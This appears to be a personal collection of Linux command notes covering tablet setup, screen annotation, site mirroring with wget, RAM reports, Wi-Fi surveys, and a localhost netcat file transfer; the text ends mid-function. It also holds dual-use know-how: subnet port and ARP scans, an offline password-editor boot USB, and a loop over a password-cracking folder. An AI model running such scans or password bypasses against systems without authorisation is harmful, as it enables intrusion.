
This example shows that 'eDP' is my wacom tablet.
$ xrandr
Screen 0: minimum 320 x 200, current 1920 x 1080, maximum 16384 x 16384
eDP connected primary 1920x1080+0+0 (normal left inverted right x axis y axis) 344mm x 194mm
1920x1080 120.00*+ 60.01
1680x1050 120.00
1280x1024 120.00
1440x900 120.00
1280x800 120.00
1280x720 120.00
1024x768 120.00
800x600 120.00
640x480 120.00
DisplayPort-1 disconnected (normal left inverted right x axis y axis)

(Ref https://askubuntu.com/questions/839161/limit-a-graphics-tablet-to-one-monitor)
Map all the Wacom devices to your desired monitor:
xsetwacom set 'Wacom One by Wacom S Pen stylus' MapToOutput eDP
xsetwacom set 'Wacom One by Wacom S Pen eraser' MapToOutput eDP
The xsetwacom syntax
The syntax of xsetwacom is flexible but not very well documented. The general mapping syntax (extracted from the source code) for xsetwacom 0.17.0 is the following.
KEYWORD [ARGS...] [KEYWORD [ARGS...] ...]

KEYWORD + ARGS:
key [+,-]KEY [[+,-]KEY ...] where +:key down, -:key up, no prefix:down and up
button BUTTON [BUTTON ...] (1=left,2=middle,3=right mouse button, 4/5 scroll mouse wheel)
modetoggle toggle absolute/relative tablet mode
displaytoggle toggle cursor movement among all displays which include individual screens plus the whole desktop for the selected tool if it is not a pad. When the tool is a pad, the function applies to all tools that are associated with the tablet

BUTTON: button ID as integer number
KEY: MODIFIER, SPECIALKEY or ASCIIKEY
MODIFIER: (each can be prefixed with an l or an r for the left/right modifier; no prefix = left) ctrl=ctl=control, meta, alt, shift, super, hyper
SPECIALKEY: f1-f35, esc=Esc, up,down,left,right, backspace=Backspace, tab, PgUp,PgDn
ASCIIKEY: (usual characters the key produces, e.g. a,b,c,1,2,3 etc.)

Some examples
$ xsetwacom set pad Button 1 3 # right mouse button
$ xsetwacom set pad Button 1 "key +ctrl z -ctrl"
$ xsetwacom get pad Button 1
key +Control_L +z -z -Control_L
$ xsetwacom set pad Button 1 "key +shift button 1 key -shift"

If you want to bind your tablet buttons to different shortcuts in different applications, you may want to map your tablet buttons to function keys, because applications generally do not let you bind keyboard shortcuts to mouse buttons. First, map the pad buttons to mouse buttons 11 and higher so that you can distinguish them from regular mouse buttons. For example:
xsetwacom set pad Button 1 11
xsetwacom set pad Button 2 12
...
Then map the mouse buttons to the function keys. This can be done with xbindkeys and xdotool by adding an entry like the following for every pad button to your ~/.xbindkeysrc:
"xdotool key F21"
b:11
"xdotool key F22"
b:12
...
Find out your tablet's resolution by running:
$ xsetwacom get 'Wacom One by Wacom S Pen stylus' Area
0 0 15200 9500

Permanent configuration

Note: Because xorg.conf lacks options that xsetwacom has, and only lets you map buttons to mouse buttons, you may want to autostart a script with xsetwacom commands instead of using xorg.conf.

Configuration can be made persistent in xorg.conf; see xorg.conf(5). You first need to find out your product names in the Xorg log file:
$ grep "Using input driver 'wacom'" ~/.local/share/xorg/Xorg.0.log
In order to draw on the entire screen, I installed Gromit-MPX 1.4. Below are the hotkeys. I used apt to install it, but the homepage is https://github.com/bk138/gromit-mpx
Gromit-MPX hotkeys:
  Toggle paint        Home
  Clear screen        Shift-Home
  Toggle visibility   Ctrl-Home
  Quit                Alt-Home
  Undo last           End
  Redo last undo      Shift-End

You can specify the keys to grab as hotkeys via:
  gromit-mpx --key <keysym> --undo-key <keysym>
You can specify the opacity simply via:
  gromit-mpx -o <opacity as real value in [0,1]>
You can set preferences in the cfg file (/etc/gromit-mpx/gromit-mpx.cfg)
If you want another minimum size instead of the default 1, add minsize like this:
You can set a maximum size as well:
You can also draw lines that end in an arrow head. For this you have to specify arrowsize. This is a factor relative to the width of the line. For reasonable arrowheads start with 1.
Additionally you can limit the Scope to specific combinations of Mousebuttons (1,2,3,4,5 or Button1,...,Button5) and Modifiers (SHIFT, CONTROL, ALT, META, while ALT==META).
If you want to have Gromit-MPX autostarted for your desktop session, the safest way to do so is via the XDG autostart facility:
Simply create a file ~/.config/autostart/gromit-mpx.desktop with the following contents:
[Desktop Entry]
Type=Application
Exec=gromit-mpx
Here are some usage examples to download an entire site.

Convert links for local viewing:
wget --mirror --convert-links --page-requisites --no-parent -P /path/to/download/to https://example-domain.com

Without converting:
wget --mirror --page-requisites --no-parent -P /path/to/download/to https://example-domain.com

One more example to download an entire site with wget:
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://example.org

Explanation of the various flags:
--mirror – Makes (among other things) the download recursive.
--convert-links – Convert all the links (also to things like CSS stylesheets) to relative, so it will be suitable for offline viewing.
--adjust-extension – Adds suitable extensions to filenames (html or css) depending on their content-type.
--page-requisites – Download things like CSS style-sheets and images required to properly display the page offline.
--no-parent – When recursing, do not ascend to the parent directory. It is useful for restricting the download to only a portion of the site.

wget --mirror --convert-links --page-requisites --no-parent -P /home/parth/JDW/website https://leadershipethicsonline.com

Ref https://gist.github.com/mikecrittenden/fe02c59fed1aeebd0a9697cf7e9f5c0c
$ sudo sx help
Fast, modern, easy-to-use network scanner

Usage:
  sx [command]

Available Commands:
  arp         Perform ARP scan
  docker      Perform Docker scan
  elastic     Perform Elasticsearch scan
  help        Help about any command
  icmp        Perform ICMP scan
  socks       Perform SOCKS5 scan
  tcp         Perform TCP scan
  udp         Perform UDP scan

Flags:
  -h, --help   help for sx

Use "sx [command] --help" for more information about a command.

Usage:
  sx tcp [flags] subnet
  sx tcp [command]

Examples:
  tcp -p 22 192.168.0.1/24
  tcp -p 22-4567 10.0.0.1
  tcp --flags fin,ack -p 22 192.168.0.3

Available Commands:
  fin         Perform TCP FIN scan
  null        Perform TCP NULL scan
  syn         Perform TCP SYN scan
  xmas        Perform TCP Xmas scan

Flags:
  -a, --arp-cache string      set ARP cache file
                              reads from stdin by default
      --exclude string        set file with IPs or subnets in CIDR notation to exclude, one-per line.
                              It is useful to exclude RFC 1918 addresses, multicast, IANA reserved space,
                              and other IANA special-purpose addresses.
      --exit-delay duration   set exit delay to wait for last response packets
                              any expression accepted by time.ParseDuration is valid (default 300ms)
  -f, --file string           set JSONL file with IPs to scan
      --flags string          set TCP flags
      --gwmac string          set gateway MAC address to send generated packets to
  -h, --help                  help for tcp
  -i, --iface string          set interface to send/receive packets
      --json                  enable JSON output
  -p, --ports string          set ports to scan
  -r, --rate string           set rate limit for generated packets
                              format: "rateCount/rateWindow" where
                              rateCount is a number of packets, rateWindow is the time interval
                              e.g. 1000/s -- 1000 packets per second
                                   500/7s -- 500 packets per 7 seconds
      --srcip ip              set source IP address for generated packets
      --srcmac string         set source MAC address for generated packets

Use "sx tcp [command] --help" for more information about a command.

sudo sx -p 2-1024 192.168.1.0/24
sudo sx arp 192.168.1.0/24
The following are ways to report the different characteristics of installed RAM.
Note that the first report was with 16GB of RAM installed. The second is immediately after installing a total of 32GB.
$ sudo dmidecode --type memory
# dmidecode 3.3
Getting SMBIOS data from sysfs.
SMBIOS 3.2.0 present.

Handle 0x0021, DMI type 16, 23 bytes
Physical Memory Array
        Location: System Board Or Motherboard
        Use: System Memory
        Error Correction Type: None
        Maximum Capacity: 64 GB
        Error Information Handle: 0x0024
        Number Of Devices: 2

Handle 0x0022, DMI type 17, 84 bytes
Memory Device
        Array Handle: 0x0021
        Error Information Handle: 0x0025
        Total Width: 64 bits
        Data Width: 64 bits
        Size: 8 GB
        Form Factor: SODIMM
        Set: None
        Locator: DIMM 0
        Bank Locator: P0 CHANNEL A
        Type: DDR4
        Type Detail: Synchronous Unbuffered (Unregistered)
        Speed: 3200 MT/s
        Manufacturer: 80CE000080CE
        Serial Number: 18C15026
        Asset Tag: 03210700
        Part Number: M471A1G44AB0-CWE
        Rank: 1
        Configured Memory Speed: 3200 MT/s
        Minimum Voltage: 1.2 V
        Maximum Voltage: 1.2 V
        Configured Voltage: 1.2 V
        Memory Technology: DRAM
        Memory Operating Mode Capability: Volatile memory
        Firmware Version: M471A1G44AB0-CWE
        Module Manufacturer ID: Bank 1, Hex 0xCE
        Module Product ID: Unknown
        Memory Subsystem Controller Manufacturer ID: Unknown
        Memory Subsystem Controller Product ID: Unknown
        Non-Volatile Size: None
        Volatile Size: 8 GB
        Cache Size: None
        Logical Size: None

Handle 0x0023, DMI type 17, 84 bytes
Memory Device
        Array Handle: 0x0021
        Error Information Handle: 0x0026
        Total Width: 64 bits
        Data Width: 64 bits
        Size: 8 GB
        Form Factor: SODIMM
        Set: None
        Locator: DIMM 0
        Bank Locator: P0 CHANNEL B
        Type: DDR4
        Type Detail: Synchronous Unbuffered (Unregistered)
        Speed: 3200 MT/s
        Manufacturer: 80CE000080CE
        Serial Number: 18C15025
        Asset Tag: 03210700
        Part Number: M471A1G44AB0-CWE
        Rank: 1
        Configured Memory Speed: 3200 MT/s
        Minimum Voltage: 1.2 V
        Maximum Voltage: 1.2 V
        Configured Voltage: 1.2 V
        Memory Technology: DRAM
        Memory Operating Mode Capability: Volatile memory
        Firmware Version: M471A1G44AB0-CWE
        Module Manufacturer ID: Bank 1, Hex 0xCE
        Module Product ID: Unknown
        Memory Subsystem Controller Manufacturer ID: Unknown
        Memory Subsystem Controller Product ID: Unknown
        Non-Volatile Size: None
        Volatile Size: 8 GB
        Cache Size: None
        Logical Size: None
Now for the new memory at 32GB
$ sudo dmidecode --type memory
[sudo] password for parth:
# dmidecode 3.3
Getting SMBIOS data from sysfs.
SMBIOS 3.2.0 present.

Handle 0x0021, DMI type 16, 23 bytes
Physical Memory Array
        Location: System Board Or Motherboard
        Use: System Memory
        Error Correction Type: None
        Maximum Capacity: 64 GB
        Error Information Handle: 0x0024
        Number Of Devices: 2

Handle 0x0022, DMI type 17, 84 bytes
Memory Device
        Array Handle: 0x0021
        Error Information Handle: 0x0025
        Total Width: 64 bits
        Data Width: 64 bits
        Size: 16 GB
        Form Factor: SODIMM
        Set: None
        Locator: DIMM 0
        Bank Locator: P0 CHANNEL A
        Type: DDR4
        Type Detail: Synchronous Unbuffered (Unregistered)
        Speed: 3200 MT/s
        Manufacturer: 859B0000802C
        Serial Number: E53EFF6A
        Asset Tag: 1A211800
        Part Number: CT16G4SFRA32A.M16FRS
        Rank: 2
        Configured Memory Speed: 3200 MT/s
        Minimum Voltage: 1.2 V
        Maximum Voltage: 1.2 V
        Configured Voltage: 1.2 V
        Memory Technology: DRAM
        Memory Operating Mode Capability: Volatile memory
        Firmware Version: CT16G4SFRA32A.M16FRS
        Module Manufacturer ID: Bank 6, Hex 0x9B
        Module Product ID: Unknown
        Memory Subsystem Controller Manufacturer ID: Unknown
        Memory Subsystem Controller Product ID: Unknown
        Non-Volatile Size: None
        Volatile Size: 16 GB
        Cache Size: None
        Logical Size: None

Handle 0x0023, DMI type 17, 84 bytes
Memory Device
        Array Handle: 0x0021
        Error Information Handle: 0x0026
        Total Width: 64 bits
        Data Width: 64 bits
        Size: 16 GB
        Form Factor: SODIMM
        Set: None
        Locator: DIMM 0
        Bank Locator: P0 CHANNEL B
        Type: DDR4
        Type Detail: Synchronous Unbuffered (Unregistered)
        Speed: 3200 MT/s
        Manufacturer: 859B0000802C
        Serial Number: E53EFE4C
        Asset Tag: 1A211800
        Part Number: CT16G4SFRA32A.M16FRS
        Rank: 2
        Configured Memory Speed: 3200 MT/s
        Minimum Voltage: 1.2 V
        Maximum Voltage: 1.2 V
        Configured Voltage: 1.2 V
        Memory Technology: DRAM
        Memory Operating Mode Capability: Volatile memory
        Firmware Version: CT16G4SFRA32A.M16FRS
        Module Manufacturer ID: Bank 6, Hex 0x9B
        Module Product ID: Unknown
        Memory Subsystem Controller Manufacturer ID: Unknown
        Memory Subsystem Controller Product ID: Unknown
        Non-Volatile Size: None
        Volatile Size: 16 GB
        Cache Size: None
        Logical Size: None
Gromit-MPX enables you to make multi-pointer annotations on your screen. It can run in the background and be activated on demand to let you draw over all your currently running applications. The drawing will stay on screen as long as you want; you can continue to use your applications while the drawing is visible.
$ cat /etc/gromit-mpx/gromit-mpx.cfg
# Default gromit-mpx configuration
# taken from Totem's telestrator mode config
# added default entries

# Uncomment to set Hot key and/or Undo key to a custom value. Note
# that you can only specify single keysyms, not key combos.
# HOTKEY = "F9";
# UNDOKEY = "F8";

"red Pen" = PEN (size=5 color="red");
"blue Pen" = "red Pen" (color="blue");
"yellow Pen" = "red Pen" (color="yellow");
"green Marker" = PEN (size=6 color="green" arrowsize=1);

"Eraser" = ERASER (size = 75);

"default" = "red Pen";
"default"[SHIFT] = "blue Pen";
"default"[CONTROL] = "yellow Pen";
"default"[2] = "green Marker";
"default"[Button3] = "Eraser";
To display all key bindings for bash:
┌──(parth㉿parth)-[~/Downloads] $ bind -P
To display all key bindings for zsh:
┌──(parth㉿parth)-[~/Downloads]
$ bindkey
"^@" set-mark-command
"^A" beginning-of-line
"^B" backward-char
"^D" delete-char-or-list
"^E" end-of-line
"^F" forward-char
"^G" send-break
"^H" backward-delete-char
"^I" expand-or-complete
"^J" accept-line
"^K" kill-line
"^L" clear-screen
"^M" accept-line
"^N" down-line-or-history
"^O" accept-line-and-down-history
"^P" toggle_oneline_prompt
"^Q" push-line
"^R" history-incremental-search-backward
"^S" history-incremental-search-forward
"^T" transpose-chars
"^U" kill-whole-line
"^V" quoted-insert
"^W" backward-kill-word
"^X^B" vi-match-bracket
"^X^F" vi-find-next-char
"^X^J" vi-join
"^X^K" kill-buffer
"^X^N" infer-next-history
"^X^O" overwrite-mode
"^X^R" _read_comp
"^X^U" undo
"^X^V" vi-cmd-mode
"^X^X" exchange-point-and-mark
"^X*" expand-word
"^X=" what-cursor-position
"^X?" _complete_debug
"^XC" _correct_filename
"^XG" list-expand
"^Xa" _expand_alias
"^Xc" _correct_word
"^Xd" _list_expansions
"^Xe" _expand_word
"^Xg" list-expand
"^Xh" _complete_help
"^Xm" _most_recent_file
"^Xn" _next_tags
"^Xr" history-incremental-search-backward
"^Xs" history-incremental-search-forward
"^Xt" _complete_tag
"^Xu" undo
"^X~" _bash_list-choices
"^Y" yank
"^[^D" list-choices
"^[^G" send-break
"^[^H" backward-kill-word
"^[^I" self-insert-unmeta
"^[^J" self-insert-unmeta
"^[^L" clear-screen
"^[^M" self-insert-unmeta
"^[^_" copy-prev-word
"^[ " expand-history
"^[!" expand-history
"^[\"" quote-region
"^[\$" spell-word
"^['" quote-line
"^[," _history-complete-newer
"^[-" neg-argument
"^[." insert-last-word
"^[/" _history-complete-older
"^[0" digit-argument
"^[1" digit-argument
"^[2" digit-argument
"^[3" digit-argument
"^[4" digit-argument
"^[5" digit-argument
"^[6" digit-argument
"^[7" digit-argument
"^[8" digit-argument
"^[9" digit-argument
"^[<" beginning-of-buffer-or-history
"^[>" end-of-buffer-or-history
"^[?" which-command
"^[A" accept-and-hold
"^[B" backward-word
"^[C" capitalize-word
"^[D" kill-word
"^[F" forward-word
"^[G" get-line
"^[H" run-help
"^[L" down-case-word
"^[N" history-search-forward
"^[OA" up-line-or-history
"^[OB" down-line-or-history
"^[OC" forward-char
"^[OD" backward-char
"^[OF" end-of-line
"^[OH" beginning-of-line
"^[P" history-search-backward
"^[Q" push-line
"^[S" spell-word
"^[T" transpose-words
"^[U" up-case-word
"^[W" copy-region-as-kill
"^[[1;5C" forward-word
"^[[1;5D" backward-word
"^[[200~" bracketed-paste
"^[[2~" overwrite-mode
"^[[3;5~" kill-word
"^[[3~" delete-char
"^[[5~" beginning-of-buffer-or-history
"^[[6~" end-of-buffer-or-history
"^[[A" up-line-or-history
"^[[B" down-line-or-history
"^[[C" forward-char
"^[[D" backward-char
"^[[F" end-of-line
"^[[H" beginning-of-line
"^[[Z" undo
"^[_" insert-last-word
"^[a" accept-and-hold
"^[b" backward-word
"^[c" capitalize-word
"^[d" kill-word
"^[f" forward-word
"^[g" get-line
"^[h" run-help
"^[l" down-case-word
"^[n" history-search-forward
"^[p" history-search-backward
"^[q" push-line
"^[s" spell-word
"^[t" transpose-words
"^[u" up-case-word
"^[w" copy-region-as-kill
"^[x" execute-named-cmd
"^[y" yank-pop
"^[z" execute-last-named-cmd
"^[|" vi-goto-column
"^[~" _bash_complete-word
"^[^?" backward-kill-word
"^_" undo
" " magic-space
"!"-"~" self-insert
"^?" backward-delete-char
"\M-^@"-"\M-^?" self-insert
Dump the contents of every file in a directory:
#!/bin/bash
# NOTE : Quote it else use array to avoid problems #
FILES="/path/to/*"
for f in $FILES
do
  echo "Processing $f file..."
  # take action on each file. $f stores the current file name
  cat "$f"
done
#!/bin/bash
# NOTE : Quote it else use array to avoid problems #
FILES="/home/parth/Hacking/Password.Cracking/passwords/*"
for f in $FILES
do
  echo "Processing $f file..."
  # take action on each file. $f stores the current file name
  cat "$f"
done
7z is a great compression utility.
Ref. https://www.tecmint.com/7zip-command-examples-in-linux/
Info about the AP you are connected to:

$ sudo iw dev wlan0 station dump
Station 88:dc:96:47:d0:af (on wlan0)
        inactive time:  15316 ms
        rx bytes:       8003973
        rx packets:     13242
        tx bytes:       915627
        tx packets:     5792
        tx retries:     607
        tx failed:      0
        beacon loss:    0
        beacon rx:      4435
        rx drop misc:   3
        signal:         -56 [-58, -56] dBm
        signal avg:     -55 dBm
        beacon signal avg:      -51 dBm
        tx bitrate:     90.0 MBit/s MCS 10 40MHz short GI
        tx duration:    0 us
        rx bitrate:     300.0 MBit/s MCS 15 40MHz short GI
        rx duration:    0 us
        authorized:     yes
        authenticated:  yes
        associated:     yes
        preamble:       long
        WMM/WME:        yes
        MFP:            no
        TDLS peer:      no
        DTIM period:    1
        beacon interval:100
        short slot time:yes
        connected time: 455 seconds
        associated at [boottime]:       3018.726s
        associated at:  1629476367125 ms
        current time:   1629476822011 ms
--------
$ iw list
        wiphy index: 0
        max # scan SSIDs: 20
        max scan IEs length: 365 bytes
        max # sched scan SSIDs: 20
        max # match sets: 8
        Retry short limit: 7
        Retry long limit: 4
        Coverage class: 0 (up to 0m)
        Device supports RSN-IBSS.
        Device supports AP-side u-APSD.
        Device supports T-DLS.
        Supported Ciphers:
                * WEP40 (00-0f-ac:1)
                * WEP104 (00-0f-ac:5)
                * TKIP (00-0f-ac:2)
                * CCMP-128 (00-0f-ac:4)
                * GCMP-128 (00-0f-ac:8)
                * GCMP-256 (00-0f-ac:9)
                * CMAC (00-0f-ac:6)
                * GMAC-128 (00-0f-ac:11)
                * GMAC-256 (00-0f-ac:12)
        Available Antennas: TX 0x3 RX 0x3
        Configured Antennas: TX 0x3 RX 0x3
        Supported interface modes:
                * IBSS
                * managed
                * AP
                * AP/VLAN
                * monitor
                * P2P-client
                * P2P-GO
                * P2P-device
        (A bunch of detailed info omitted for brevity)

$ sudo iw wlan0 scan | egrep "^BSS|SSID"
BSS 88:dc:96:47:d0:af(on wlan0) -- associated
        SSID: CCCCPrivate
BSS 88:dc:96:49:b3:8e(on wlan0)
        SSID: CCCC_Tech_Booth
BSS 88:dc:96:49:b3:82(on wlan0)
        SSID: CCCCPrivate
BSS 8a:dc:96:49:b3:82(on wlan0)
        SSID: CCCCPublic
BSS 88:dc:96:47:d0:ae(on wlan0)
        SSID: CCCCPrivate
BSS 8a:dc:96:47:d0:ae(on wlan0)
        SSID: CCCCPublic
BSS 88:dc:96:49:b3:88(on wlan0)
        SSID: CCCCPrivate
BSS 8a:dc:96:49:b3:88(on wlan0)
        SSID: CCCCPublic
BSS e8:9f:80:43:55:05(on wlan0)
        SSID: CCCCPrivate
        * SSID List
BSS ee:9f:80:43:55:05(on wlan0)
        SSID:
        * SSID List
BSS e8:9f:80:43:55:06(on wlan0)
        SSID: CCCCPrivate
        * SSID List
BSS 68:39:43:98:7a:9f(on wlan0)
        SSID: HLD_1987A9F
BSS 88:dc:96:49:b3:8f(on wlan0)
        SSID: CCCC_Tech_Booth
BSS 88:dc:96:49:b3:83(on wlan0)
        SSID: CCCCPrivate
BSS 8a:dc:96:49:b3:83(on wlan0)
        SSID: CCCCPublic
--------
$ nmcli -f in-use,ssid,chan,bars,security,bssid dev wifi list
IN-USE  SSID             CHAN  BARS  SECURITY   BSSID
        CCCC_Tech_Booth  1     ▂▄▆█  WPA2       88:DC:96:49:B3:8E
        CCCCPrivate      6     ▂▄▆█  WPA2       88:DC:96:49:B3:82
        CCCCPrivate      6     ▂▄▆█  WPA2       88:DC:96:47:D0:AE
        CCCCPublic       6     ▂▄▆█  --         8A:DC:96:49:B3:82
        CCCCPublic       6     ▂▄▆█  --         8A:DC:96:47:D0:AE
        CCCC_Tech_Booth  60    ▂▄▆_  WPA2       88:DC:96:49:B3:8F
        CCCCPrivate      60    ▂▄▆_  WPA2       88:DC:96:49:B3:83
        CCCCPublic       60    ▂▄▆_  --         8A:DC:96:49:B3:83
*       CCCCPrivate      44    ▂▄▆_  WPA2       88:DC:96:47:D0:AF
        HLD_1987A9F      165   ▂▄▆_  WPA1 WPA2  68:39:43:98:7A:9F
        CCCCPrivate      6     ▂▄__  WPA2       E8:9F:80:43:55:05
        --               6     ▂▄__  WPA2       EE:9F:80:43:55:05
        CCCCPrivate      36    ▂___  WPA2       E8:9F:80:43:55:06
        CCCCPrivate      6     ▂___  WPA2       88:DC:96:49:B3:88
        CCCCPublic       6     ▂___  --         8A:DC:96:49:B3:88
        CCCCPrivate      161   ▂___  WPA2       E8:9F:80:43:55:07
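The nmcli table above is easy to eyeball once, but on a site survey you want the weak spots pulled out automatically. The following is an added example (my own code, not from these notes): it parses the scan table using the header's column offsets (whitespace splitting fails because IN-USE is usually blank and SECURITY can read "WPA1 WPA2"), then flags open networks, legacy protocols and hidden SSIDs, and groups BSSIDs per SSID. The sample table is the scan above, re-typed as a constant.

```python
# Added example, not part of the original notes. Assumes the column layout printed by
# `nmcli -f in-use,ssid,chan,bars,security,bssid dev wifi list`.
from collections import defaultdict

# Constructed sample: the scan shown above, re-typed in nmcli's column layout.
SAMPLE_SCAN = """\
IN-USE  SSID             CHAN  BARS  SECURITY   BSSID
        CCCC_Tech_Booth  1     ▂▄▆█  WPA2       88:DC:96:49:B3:8E
        CCCCPrivate      6     ▂▄▆█  WPA2       88:DC:96:49:B3:82
        CCCCPrivate      6     ▂▄▆█  WPA2       88:DC:96:47:D0:AE
        CCCCPublic       6     ▂▄▆█  --         8A:DC:96:49:B3:82
        CCCCPublic       6     ▂▄▆█  --         8A:DC:96:47:D0:AE
        CCCC_Tech_Booth  60    ▂▄▆_  WPA2       88:DC:96:49:B3:8F
        CCCCPrivate      60    ▂▄▆_  WPA2       88:DC:96:49:B3:83
        CCCCPublic       60    ▂▄▆_  --         8A:DC:96:49:B3:83
*       CCCCPrivate      44    ▂▄▆_  WPA2       88:DC:96:47:D0:AF
        HLD_1987A9F      165   ▂▄▆_  WPA1 WPA2  68:39:43:98:7A:9F
        CCCCPrivate      6     ▂▄__  WPA2       E8:9F:80:43:55:05
        --               6     ▂▄__  WPA2       EE:9F:80:43:55:05
        CCCCPrivate      36    ▂___  WPA2       E8:9F:80:43:55:06
        CCCCPrivate      6     ▂___  WPA2       88:DC:96:49:B3:88
        CCCCPublic       6     ▂___  --         8A:DC:96:49:B3:88
        CCCCPrivate      161   ▂___  WPA2       E8:9F:80:43:55:07
"""

COLUMNS = ["IN-USE", "SSID", "CHAN", "BARS", "SECURITY", "BSSID"]


def parse_nmcli_wifi(text):
    """Split nmcli's fixed-width table using the header's column offsets."""
    lines = [line for line in text.splitlines() if line.strip()]
    header, rows = lines[0], lines[1:]
    # str.index finds the first occurrence, so "SSID" resolves to the SSID
    # column and not to the later "BSSID" header.
    starts = [header.index(name) for name in COLUMNS]
    bounds = list(zip(starts, starts[1:] + [None]))
    records = []
    for row in rows:
        rec = {name: row[a:b].strip() for name, (a, b) in zip(COLUMNS, bounds)}
        rec["IN-USE"] = rec["IN-USE"] == "*"
        rec["CHAN"] = int(rec["CHAN"])
        records.append(rec)
    return records


def audit_wifi(text):
    """Flag open networks, legacy protocols and hidden SSIDs; map SSIDs to BSSIDs."""
    findings = []
    bssids_by_ssid = defaultdict(set)
    in_use = None
    for ap in parse_nmcli_wifi(text):
        ssid, bssid, sec = ap["SSID"], ap["BSSID"], ap["SECURITY"].split()
        bssids_by_ssid[ssid].add(bssid)
        if ap["IN-USE"]:
            in_use = bssid
        if ap["SECURITY"] == "--":
            findings.append((bssid, ssid, "open network: traffic is not encrypted"))
        elif any(proto in sec for proto in ("WEP", "WPA1")):
            findings.append((bssid, ssid, "legacy protocol offered: " + " ".join(sec)))
        if ssid == "--":
            findings.append((bssid, ssid, "hidden SSID"))
    return {
        "findings": findings,
        "bssids_by_ssid": {k: sorted(v) for k, v in bssids_by_ssid.items()},
        "in_use": in_use,
    }


if __name__ == "__main__":
    report = audit_wifi(SAMPLE_SCAN)
    print("connected to", report["in_use"])
    for bssid, ssid, issue in report["findings"]:
        print(f"{bssid}  {ssid!r:18} {issue}")
    for ssid, bssids in report["bssids_by_ssid"].items():
        print(f"{ssid!r}: {len(bssids)} BSSID(s)")
```

Pipe the real `nmcli ... dev wifi list` output into `audit_wifi` to run it against a live scan.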
arp-scan

As said on this answer, you can use the arp-scan package. Just arp-scan -l.

arp-scan is a command-line tool for system discovery and fingerprinting. It constructs and sends ARP requests to the specified IP addresses, and displays any responses that are received.

With systemd/udev names I found very useful an alias to
  sudo arp-scan -l -t 200 -I $(ls /sys/class/net | grep -o "wl[^\t]\+")
for the wireless interface, and en instead of wl for wired interfaces.

-I --interface   Use network interface <interface>. If this option is not specified, arp-scan will search the system interface list for the lowest numbered, configured up interface (excluding loopback).
-l --localnet    Generate addresses from network interface configuration. Use the network interface IP address and network mask to generate the list of target host addresses.
-t --timeout     Set initial per host timeout to <ms>, default=100. This timeout is for the first packet sent to each host.

To read the arp cache table, cool kids nowadays use ip neighbor.

A more sophisticated example:
sudo arp-scan -l -t 200 -I $(ls /sys/class/net | grep -o "wl[^\t]\+")
Plug in a FAT formatted USB.
Copy the Offline Password Editor files to the USB
┌──(parth㉿parth)-[~/Downloads/syslinux-6.03/bios/mbr]
$ ls /media/parth/8258-FD58
boot.msg    isolinux.bin  ldlinux.c32  readme.txt  syslinux.cfg  vmlinuz
initrd.cgz  isolinux.cfg  ldlinux.sys  scsi.cgz    syslinux.exe
Now make the USB bootable
┌──(parth㉿parth)-[~/Downloads/syslinux-6.03/linux]
$ cat /proc/partitions
major minor  #blocks  name

 259        0  500107608 nvme0n1
 259        1     524288 nvme0n1p1
 259        2     499712 nvme0n1p2
 259        3  499082240 nvme0n1p3
 254        0  499065856 dm-0
 254        1  498020352 dm-1
 254        2     999424 dm-2
   8        0   15360000 sda
   8        1   15359968 sda1

┌──(parth㉿parth)-[~/Downloads/syslinux-6.03/bios/linux]
$ sudo ./syslinux -i /dev/sda1
[sudo] password for parth:

┌──(parth㉿parth)-[~/Downloads/syslinux-6.03/bios/mbr]
$ sudo dd conv=notrunc bs=440 count=1 if=mbr.bin of=/dev/sda
1+0 records in
1+0 records out
440 bytes copied, 0.000151555 s, 2.9 MB/s

(Ref: http://wiki.robotz.com/index.php/Creating_bootable_USB_Flash_Drive)
nc (NetCat) can be used for many things. For example, transferring a file from one computer to another over a network.
Identify the file to be transferred. In this case the 'Stuff.To.Process.txt' file in the parth home directory (~).
Note that you need to press Ctrl+C to tear down the network socket (connection).
$ ls -tor Stuff.To.Process.txt
-rw-r--r-- 1 parth 2828 Aug 24 20:11 Stuff.To.Process.txt
Next we start the server that will send the file. Here nc is verbosely (v) listening (l) on port 4096. When a connection is made to port 4096, nc sends the contents of the file that cat piped into it.
$ cat Stuff.To.Process.txt | nc -vl 4096
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4096
Ncat: Listening on 0.0.0.0:4096
Ncat: Connection from ::1.
Ncat: Connection from ::1:37962.
The client then requests the file. In this case it is on the same host (the network address is the local loopback, 127.0.0.1). When material is returned from the server to this client, the client redirects (>) that data flow to a file named 'dup.Stuff.To.Process.txt'. Notice that the server is sending from the home directory (~) while the receiving client is in the ~/Scratch/ directory.
You can then press Ctrl+C on either the server or the client to tear down the network socket (session/connection).
┌──(parth㉿parth)-[~/Scratch]
$ nc localhost 4096 > dup.Stuff.To.Process.txt
^C
You can compare the file sizes of the original and the duplicated file to see that they are (most likely) identical. To be sure they are identical, use an md5 hashing tool to compare their hashes.
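The same exchange, written as an added example (my own code, not from these notes) so it can run unattended on one host: a sender that behaves like `cat FILE | nc -l PORT`, a receiver that behaves like `nc localhost PORT > COPY`, and then the size and hash comparison. The hypothetical helper names (serve_file_once, fetch_file, verify_copy, verify_pair) are this example's own; the sample file content is constructed.

```python
# Added example, not part of the original notes. Uses an ephemeral loopback port
# instead of 4096 so it never collides with a listener that is already running.
import hashlib
import os
import socket
import tempfile
import threading

CHUNK = 65536


def serve_file_once(path, ready):
    """Sender side, like `cat path | nc -vl PORT`: listen on an ephemeral loopback
    port, stream the file to the first client, then close (no Ctrl+C needed)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the kernel pick a free port
    srv.listen(1)
    ready["port"] = srv.getsockname()[1]
    ready["event"].set()                # tell the client which port to use
    conn, _ = srv.accept()
    with conn, open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            conn.sendall(chunk)
    srv.close()                         # closing conn is the EOF the client waits for


def fetch_file(port, dest):
    """Receiver side, like `nc localhost PORT > dest`: read until the sender closes."""
    with socket.create_connection(("127.0.0.1", port)) as conn, open(dest, "wb") as out:
        for chunk in iter(lambda: conn.recv(CHUNK), b""):
            out.write(chunk)


def digest(path, algo):
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_copy(src, dst):
    """Equal size is necessary but not sufficient; only the hash proves the copy is identical."""
    return {
        "size_match": os.path.getsize(src) == os.path.getsize(dst),
        "md5_match": digest(src, "md5") == digest(dst, "md5"),
        "sha256_match": digest(src, "sha256") == digest(dst, "sha256"),
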